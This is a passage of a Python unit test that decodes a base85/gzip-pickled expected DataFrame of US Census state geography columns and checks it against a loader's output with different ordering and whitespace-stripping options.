b'nI-){rTsPQi>8h?Y$BIr@H1kIHD?n^Gm*;VWs-@Qk%ylXV<ab%8yT<$e{W6e3-WKa2M^I9mssP>TtY8hVs*`p45eMaw7PypyBgVyi' \ b'C@#jS<`JYyF2k4x~8G*uQ{y0K*2w7Q&Wdw>eP<kT1z-g2Wc+&Cvbvda<?)700' correct_df = pickle.loads(gzip.decompress(base64.b85decode(correct))) pandas.testing.assert_frame_equal(correct_df, df) df_o = q.load_dataframe(preserve_order=True, strip_whitespace=False) pandas.testing.assert_frame_equal(correct_df[[ 'STATEFP', 'STATENS', 'AFFGEOID', 'GEOID', 'STUSPS', 'NAME', 'LSAD', 'ALAND', 'AWATER', ]], df_o) df_s = q.load_dataframe(preserve_order=False, strip_whitespace=True) correct_df.NAME = correct_df.NAME.str.strip() pandas.testing.assert_frame_equal(correct_df, df_s)